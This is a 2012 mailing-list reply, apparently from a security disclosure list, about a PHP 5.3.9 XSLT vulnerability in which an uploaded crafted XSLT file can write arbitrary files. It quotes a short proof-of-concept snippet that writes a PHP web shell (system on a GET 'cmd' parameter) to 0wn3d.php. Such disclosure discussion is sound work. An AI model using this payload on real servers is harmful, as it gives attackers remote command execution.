Re: CVE affected for PHP 5.3.9 ?

[Ignacio Espinosa <osu () quodvis net>]

On Fri, 13 Jan 2012 13:50:59 -0700
Kurt Seifried <kseifried () redhat com> wrote:
> [...]
> Ok I'm still not clear on what the security claim is. Are you saying you
> can cause arbitrary text output via XSL/XML mangling tricks? And
> combined with having a script that uses something like "<sax:output
> href="0wn3d.php" method="text">" you can put arbitrary text content into
> this file which could then result in the file being parsed? The problem
> is you'd have to write a script that does this, writes to a local file
> with a file ending in .php or .shtml or whatever, in which case it's
> pretty clear the script writer MEANT to do that. Again I'm still not
> clear on what/how a security boundary is being crossed. How does this
> elevate privileges or give you remote access that you wouldn't already
> if you can upload arbitrary PHP scripts?

You don't need to upload arbitrary php scripts to make this works. Just uploading a crafted xslt file will create 
(before patch)  a file with arbitrary content, php code for example, as write-access is set for default.

-- snip --
        <sax:output href="0wn3d.php" method="text">
        <xsl:value-of select="'&lt;?php system(\$_GET[&quot;cmd&quot;]);?&gt;'"/>
-- snip --


-- 
Ignacio Espinosa <osu () quodvis net>